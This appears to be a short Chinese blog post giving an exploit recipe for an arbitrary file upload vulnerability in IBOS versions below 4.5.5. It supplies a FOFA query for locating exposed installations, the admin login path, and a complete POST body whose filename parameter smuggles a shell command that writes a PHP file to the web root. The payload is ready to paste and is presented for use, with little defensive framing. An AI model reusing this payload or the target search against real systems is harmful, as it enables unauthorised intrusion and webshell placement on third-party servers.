# IBOS 數據庫模塊 任意文件上傳漏洞
==漏洞影響==
IBOS < 4.5.5
==FOFA==
body=”IBOS” && body=”login-panel”
==漏洞利用==
登錄頁面如下
http://xxx.xxx.xxx.xxx/?r=dashboard/default/login
找到数据库备份模块,啓用更多選項,備份方式選擇Mysql Dump 提交并抓包
修改filename參數發送包會上傳peiqi.php文件到根目錄
backuptype=all&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=peiqi%26echo "">peiqi%PATHEXT:~0,1%php%26peiqi&dbSubmit=1
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容